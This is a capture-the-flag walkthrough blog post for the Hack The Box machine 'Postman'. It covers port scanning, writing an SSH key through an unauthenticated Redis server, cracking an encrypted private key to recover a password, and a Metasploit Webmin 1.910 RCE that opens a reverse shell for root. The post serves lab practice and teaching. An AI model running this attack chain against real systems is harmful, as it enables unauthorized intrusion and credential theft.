Pages

Search

HTB Postman

$ nmap -A -p- -T4 10.10.10.160

Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-14 10:05 CET
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.039s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.98 seconds

Open ports:

  • 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
  • 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
  • 6379/tcp open redis Redis key-value store 4.0.9
  • 10000/tcp open http MiniServ 1.910 (Webmin httpd)

$ gobuster dir -u http://10.10.10.160 -w

/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.160
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/11/14 10:19:08 Starting gobuster
===============================================================
http://10.10.10.160/images (Status: 301)
http://10.10.10.160/upload (Status: 301)
http://10.10.10.160/css (Status: 301)
http://10.10.10.160/js (Status: 301)
http://10.10.10.160/fonts (Status: 301)
http://10.10.10.160/server-status (Status: 403)
===============================================================
2020/11/14 10:40:54 Finished
===============================================================

Access to http://10.10.10.160

Access to http://10.10.10.160:10000

Access to https://10.10.10.160:1000

Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker (from here). By default and commonly Redis uses a plain-text based protocol, but you have to keep in mind that it can also implement ssl/tls. Learn how to run Redis with ssl/tls here.

https://redis.io/

Default port: 6379

PORT     STATE SERVICE  VERSION
6379/tcp open  redis    Redis key-value store 4.0.9

Information about how to play with a Redis can be found here:

https://book.hacktricks.xyz/pentesting/6379-pentesting-redis

$ redis-cli -h 10.10.10.160

10.10.10.160:6379>

No credentials are needed to access this Redis.

10.10.10.160:6379> info

# Server
redis_version:4.0.9
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:9435c3c2879311f3
redis_mode:standalone
os:Linux 4.15.0-58-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:7.4.0
process_id:652
run_id:117c0dfdc1040fa8415cd84b0a23020f5b170cc9
tcp_port:6379
uptime_in_seconds:6843
uptime_in_days:0
hz:10
lru_clock:11515720
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf

Redis versions between 4.0 and 5.0 are vulnerable to unauthenticated command execution and file writes.

The default directory is:

10.10.10.160:6379> config get dir

1) "dir"
2) "/var/lib/redis"

10.10.10.160:6379> config get key

(empty array)

10.10.10.160:6379> GET ssh_key

"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLEx4TwF7Qrog/U0RVKNT/hqx16aAEy0j1pBxOhtPgK1J4wEGgvcnlMSsX3t6O0DKyCrKz2AmZo7XTgVLVFwpn41puHu9fuasrJbLFCbGDC3CfGIcP/VBFI7P+9ofMTi3Ty/Tfv3/UmZv6HfHvpot7VMgStLTxzQS6/xym2st+TGqakAc/fKUy1qKc1KK4/N3QAgRA7ATU/S7/DaVnq7As4DlM0zaHK1+KaUZT/UoMa7Z9XuTrbnBKTROU3/fh4qKz+b82t4FHyz9Rbez0ULQZo4nnoa6kERMwzAsQiKwUjtBeK1d8KLxiHnjuYFr0B4GDZ0hEQRnHCx33JXxTXiVq5cSlVSNkT6QqghDhFvekaRlHtYoImM6QmawnNWR7D/RKysvfIbbAp2rZY35DHpg99dFfJaG0GGkjsg3aEV/SR9OQmp4tAGbvsyFz39NeMaCV+u5cs8jGboqrdfef//XMMhWzgb/UjVUxjdT4zR2vqudboqn/Il40nyHIxAp/fKE= ruben@kali\n\n\n\n"

10.10.10.160:6379> config set dir

/var/lib/redis/.ssh
OK

10.10.10.160:6379> config set dbfilename

"autorized_keys"
OK

10.10.10.160:6379> save

OK

$ ssh -i postman redis@10.10.10.160

Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sat Nov 14 15:28:55 2020 from 10.10.14.39
redis@Postman:~$

redis@Postman:~$ whoami

redis

Let’s run linpeas to try to make a deeper enumeration of the box to guess how we can proceed from here to make a lateral movement to be user and root.

redis@Postman:~$ ./linpeas.sh

Analyzing these results we find that there is an ssh id in /opt

[+] Searching ssl/ssh files
/var/lib/redis/.ssh/authorized_keys
/var/lib/redis/.ssh/known_hosts
/var/lib/redis/.ssh/authorized_keys
/var/lib/redis/.ssh/known_hosts  /usr/lib/initramfs-tools/etc/dhcp/dhclient-enter-hooks.d/config
/usr/src/linux-headers-4.15.0-58/scripts/config /opt/id_rsa.bak   
Port 22
PermitRootLogin yes
PubkeyAuthentication yes
PasswordAuthentication yes
ChallengeResponseAuthentication no
UsePAM yes
 --> /etc/hosts.allow file found, read the rules:
/etc/hosts.allow

redis@Postman:/opt$ ls -la

total 12
drwxr-xr-x  2 root root 4096 Sep 11  2019 .
drwxr-xr-x 22 root root 4096 Sep 30 16:14 ..
-rwxr-xr-x  1 Matt Matt 1743 Aug 26  2019 id_rsa.bak
redis@Postman:/opt$

This id is from user Matt.

redis@Postman:/opt$ cat /opt/id_rsa.bak

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----
redis@Postman:/opt$

We can crack it using John The Ripper.

Copy this key to a file in our machine.

$ python2 /usr/share/john/ssh2john.py priv_id.key > hash.txt
$ john hash.txt --wordlist=../rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (priv_id.key)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:11 DONE (2020-11-14 17:37) 0.08445g/s 1211Kp/s 1211Kc/s 1211KC/sa6_123..*7¡Vamos!
Session completed

password is computer2008

$ ssh Matt@10.10.10.160

Matt@10.10.10.160's password: 
Permission denied, please try again.

redis@Postman:/opt$ su Matt

Password: 
Matt@Postman:/opt$

Matt@Postman:/opt$ cd /home/Matt/

501eXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Remember Webmin login?

It needs system credentials and now we have Matt’s.
Let’s try:

The version of Webmin can be found here:

Matt@Postman:/etc/webmin$ cat version

1.910

According to searchploit:

Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)

So, let’s run Metasploit.

msf6 > search webmin

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  auxiliary/admin/webmin/edit_html_fileaccess  2012-09-06       normal     No     Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
   1  auxiliary/admin/webmin/file_disclosure       2006-06-30       normal     No     Webmin File Disclosure
   2  exploit/linux/http/webmin_backdoor           2019-08-10       excellent  Yes    Webmin password_change.cgi Backdoor
   3  exploit/linux/http/webmin_packageup_rce      2019-05-16       excellent  Yes    Webmin Package Updates Remote Command Execution
   4  exploit/unix/webapp/webmin_show_cgi_exec     2012-09-06       excellent  Yes    Webmin /file/show.cgi Remote Command Execution
   5  exploit/unix/webapp/webmin_upload_exec       2019-01-17       excellent  Yes    Webmin Upload Authenticated RCE

Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/webapp/webmin_upload_exec

msf6 > use 3

[*] Using configured payload cmd/unix/reverse_perl

msf6 exploit(linux/http/webmin_packageup_rce) > show info

Name: Webmin Package Updates Remote Command Execution
     Module: exploit/linux/http/webmin_packageup_rce
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-05-16

Provided by:
  AkkuS <Özkan Mustafa Akkuş>

Available targets:
  Id  Name
  --  ----
  0   Webmin <= 1.910

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    yes       Webmin Password
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      10000            yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base path for Webmin application
  USERNAME                    yes       Webmin Username
  VHOST                       no        HTTP server virtual host

Payload information:
  Space: 512

Description:
  This module exploits an arbitrary command execution vulnerability in 
  Webmin 1.910 and lower versions. Any user authorized to the "Package 
  Updates" module can execute arbitrary commands with root privileges.

References:
  https://cvedetails.com/cve/CVE-2019-12840/
  https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html

msf6 exploit(linux/http/webmin_packageup_rce) > show options

Module options (exploit/linux/http/webmin_packageup_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      10000            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME                    yes       Webmin Username
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Webmin <= 1.910

msf6 exploit(linux/http/webmin_packageup_rce) > set password computer2008
msf6 exploit(linux/http/webmin_packageup_rce) > set rhost 10.10.10.160
msf6 exploit(linux/http/webmin_packageup_rce) > set username Matt
msf6 exploit(linux/http/webmin_packageup_rce) > set lhost 10.10.14.5
msf6 exploit(linux/http/webmin_packageup_rce) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[-] Exploit aborted due to failure: unknown: Failed to retrieve session cookie
[*] Exploit completed, but no session was created.

msf6 exploit(linux/http/webmin_packageup_rce) > set ssl true

[!] Changing the SSL option's value may require changing RPORT!

ssl => true
msf6 exploit(linux/http/webmin_packageup_rce) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[+] Session cookie: 0ef38e551a4d793163480d7ecde57a55
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.5:4444 -> 10.10.10.160:58664) at 2020-11-14 18:39:29 +0100

whoami

root

cat /root/root.txt

1f29XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *